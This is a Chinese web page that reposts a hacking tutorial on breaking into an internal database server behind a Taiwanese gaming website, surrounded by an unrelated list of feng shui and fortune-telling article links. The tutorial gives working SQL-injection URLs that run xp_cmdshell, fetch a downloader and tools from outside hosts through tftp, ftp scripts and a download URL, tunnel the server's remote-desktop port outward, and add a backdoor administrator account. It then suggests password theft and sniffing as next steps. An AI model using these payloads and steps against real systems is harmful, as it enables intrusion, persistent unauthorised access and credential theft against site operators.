135风水号码吉凶网联系电话
当前位置: 首页 >> 文摘分享 >> 正文

内网数据库服务器入侵实战


前言
:对付服务器在内网而且对外不开放端口的数据库服务器,除了反弹端口得到一个shell外,没别的好办法,Do all in cmd,太麻烦,不方便我们进一步渗透内网,以下通过一个站点说明我的办法。

目标:http://xx.tw,台湾最大的游戏综合网站,前期信息,web存在注入点,web服务器和数据库服务器不是同一个机器。连接数据库服务器的是sql的sa权限,用nbsi2看过,是在内网,而且数据库服务器对外不开端口,web服务器只开80端口映射,我们来看看数据库服务器能不能上网。
http://xx..tw/news-game.asp?ch_id=001&newsid=2215' create table [xl] ([xl1][varchar](255),[xl2][varchar](255))—

http://xx..tw/news-game.asp?ch_id=001&newsid=2215' insert into xl(xl1) exec%20wangyumin.dbo.xp_cmdshell%20'ping 163.com'--

然后爆出xl1的内容,恩,这个内网的机器可以上网,一切都是这么幸运。开始传一个可以下载东西的程序过去先。是winegg的down.exe

http://xx..tw/news-game.asp?ch_id=001&newsid=2215 insert%20into%20xl(xl1) exec%20wangyumin.dbo.xp_cmdshell%20'tftp -I 211.78.39.64 get down.exe'--

用xp_dirtree看看,system32下没这个文件,xl1里边也显示超时不成功,换个tftp服务器测试,还是不成功,只有用ftp了:

http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec%20wangyumin.dbo.xp_cmdshell%20'echo open 211.78.39.64 >345.txt'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec%20wangyumin.dbo.xp_cmdshell%20'echo xxxx >>345.txt'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec%20wangyumin.dbo.xp_cmdshell%20'echo xxxx >>345.txt'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec%20wangyumin.dbo.xp_cmdshell%20'echo get down.exe >>345.txt'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec%20wangyumin.dbo.xp_cmdshell%20'echo qui >>345.txt'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec%20wangyumin.dbo.xp_cmdshell%20'ftp -s:345.txt'--

 

ok,成功。然后可以下载东西了,先下载个卡端口的fprt.exe,查看xl1,发现成功,看看他开了什么端口。

http://xx.tw/news-game.asp?ch_id=001&newsid=2215'%20insert%20into%20xl(xl1)%20exec%20wangyumin.

dbo.xp_cmdshell%20'down.exe%20http://666w.com/tools/foprt.exe'--

 

 
http://xx.tw/news-game.asp?ch_id=001&newsid=2215'%20insert%20into%20xl(xl1)%20exec%20wangyumin.

dbo.xp_cmdshell%20'fport'--

 

开了3389,但是显然没对外网映射,怎么办呢?我们要把他映射出来,找到了yyc写的vIDC软件,这个软件分客户端和服务器端,服务器端 idc.exe在肉鸡运行,使用默认8080端口,直接在肉鸡运行就ok。客户端vIDCc.exe、vIDCc.DLL,是图形界面的,不能用,我来修改一下,加个ini文件,让他按ini文件里的配置自动连接绑定端口,ok,用down.exe下载到入侵的服务器,运行就已经绑定了3389了,在入侵的机器上添加管理员:

http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec wangyumin.dbo.xp_cmdshell 'vidcc.exe'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec wangyumin.dbo.xp_cmdshell 'net user xiaolu luaixue /add'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec wangyumin.dbo.xp_cmdshell 'net localgroup administrators xiaolu /add'--

Ok 登陆,

进去后,看了看web服务器开了几乎所有能开的端口包括139,然后,findpass,sniffer,等等,就看你的了。
因为象这类入侵内网数据库的文章实在少见。所以收藏!

 

 

上一篇:黑*客技术之知道对方IP入侵别人的电脑

下一篇:如何入侵网站

点此返回文摘分享

点此返回135风水号码吉凶网首页

号码蕴藏的秘密

吉祥手机号码浅析

教你如何选择大吉大利的号码

选择手机号码 、电话号码等数字的吉祥号码算法

一切号码都储存了主人的信息

最准周易预测电话方法(1)

最准周易预测电话方法(2)

催旺桃花的手机号码

今年哪些手机号码最旺气

12生肖手机颜色风水禁忌 

今年带啥数字手机号码最旺

今年最旺运的手机号码

从手机号码中看姓名学

从电话号码测沟通秘籍

今年哪些手机号最旺财运

你的手机号码“招桃花”吗? 

你的手机从风水角度看是福星还是祸害?

你的手机尾号招桃花吗? 

让手机颜色为你改变运程

根据生肖选对手机号码添好运 

根据十二生肖属相选择大吉大利的吉祥手机号码

手机号码预示你的爱情期限 

从手机号码测你的人际关系

从手机号码看男人聊天的爱好

用手机号码测你恋爱运程

通过手机号码测试8月桃花运

手机号码跟姓名学怎么搭配

分析手机号码预测你11月桃花运

应该怎样才能买到一个大吉大利的手机号码?

用手机号码占卜你的爱情期限

手机外形、颜色、号码开运宝典

手机号码是否影响了你的运势

手机号码桃花灵数计算方法

手机号码尾数暗示你的爱情期限

手机号码尾数占卜命运吉凶

手机颜色帮助增进运势

五月最旺桃花运的手机号码

幸运手机号码大占卜

个股周易预测奇门起局方法

股票卖点周易分析要领

股市用周易梅花易数绝算法简介

周易奇门预测股市经验

周易小成图预测股市方法

应用周易八卦炒股票

股票中周易三爻卦的实用预测

周易预测股票的方法1

周易预测股票的方法2

周易预测股票指数

奇门企业发展规划预测纲要

阳宅奇门日课

奇门日课与奇门催财

奇门预测天气 升学秘法

奇门运筹与择吉

奇门择日 同日不同时 一家平安一家灾 

月家奇门股市用法经验

从女子面相看性器官及性欲

面相常用断法

如何解灾化煞并改变运气的科学之道

手相口诀

手相篇 预测人生

相理实战经验集锦

相面部位秘诀

相学中的痣相研究

痣对人生的影响

痣对人生的影响力

《周易》时空象数易占实例欣赏

周易六十甲子纳音表 

大师教你用周易催旺桃花运大秘诀!

12地支与现代时间对应.在预测股票中应用 

2010年结婚吉日一览表

避邪的知识

改善命运的原理与唯一的方法

关于梦境

汉字可测万事万物

黄勇智疑难化解趋避法

婚姻大利月周易择日

简单方法促进百年好合夫妻缘分

《结婚看日子的六用六不用》

如何择吉日

你了解自己吗?

汽车与人的运程

巧用二十四时辰避凶煞.为人类造福

周易日课神杀传真

喜神財神方位

如何选择黄道吉日 1

三百六十行

邵伟华上了中国教育电视台!

生活中的周易预测方法引用

十三个常见梦境的解析

细说八字推命不能决定的因素

详细选日择吉

消杀业得大富贵的金刚经

择日学引用

怎样看结婚日子

中国数术学万事三角定律基础知识(一)

诸葛亮马前课指算法预测